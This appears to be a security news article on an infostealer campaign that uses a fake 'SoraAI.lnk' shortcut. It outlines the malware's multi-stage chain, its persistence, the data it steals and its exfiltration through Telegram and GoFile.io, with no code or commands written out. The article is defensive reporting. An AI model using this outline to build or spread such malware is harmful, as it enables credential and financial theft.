Threat actors are now leveraging the growing popularity of OpenAI’s Sora, a cutting-edge video generation model, to distribute malicious software. This sophisticated malware campaign uses a file disguised as a legitimate shortcut named “SoraAI.lnk” to trick unsuspecting users into infection. This information-stealing malware mimics the branding of Sora to deceive users into initiating a complex, multi-stage attack chain against them. This campaign clearly highlights the increasing use of social engineering tactics to exploit user trust in many well-known AI tools.
The malicious attack begins with the execution of the shortcut, which then downloads a malicious batch file from a GitHub repository. This script then executes a looped download attempt for additional payloads, ensuring persistence even if any of the initial attempts fail. The subsequent stages of the attack involve the execution of further batch files, which orchestrate the installation of legitimate Python packages. These packages, including requests and cryptography, are ultimately used to run a malicious Python script named “python.py,” the core of the malware. This final script then establishes its persistence on the victim’s computer by placing itself directly in the system’s startup folder. This ensures the malware runs automatically.
The attack begins when a user double-clicks the deceptive “SoraAI.lnk” shortcut file, which then triggers a connection to launch a hidden PowerShell process.
The malware’s primary function is to target and exfiltrate a very wide array of sensitive personal and financial data from the infected computer. It systematically extracts browser cookies, saved passwords, and user profiles from applications like Chrome, Firefox, and also the Opera web browser. Additionally, it actively collects detailed system information, saved Wi-Fi credentials, cryptocurrency wallet details, and also valuable configuration data from popular gaming platforms. The harvested data is then compressed into a zip file and exfiltrated from the system via a Telegram bot API to the attackers. For any larger files that exceed 49MB, the malware uploads them to the external hosting service known as GoFile.io.
This intricate attack chain also actively scavenges for files with many common extensions, such as PDF, JPG, and TXT documents.
It searches for these files in critical directories like the user’s Downloads and Documents folders, amplifying the potential damage to victims. As the digital landscape continues to evolve, distinguishing between legitimate and malicious online resources has now become absolutely paramount for all users. They must exercise extreme caution by downloading files exclusively from trusted sources and verifying authenticity before any execution of unknown files. Staying informed about new cyberattack methodologies and deploying robust antivirus solutions can significantly mitigate the many risks from these campaigns.
Reference: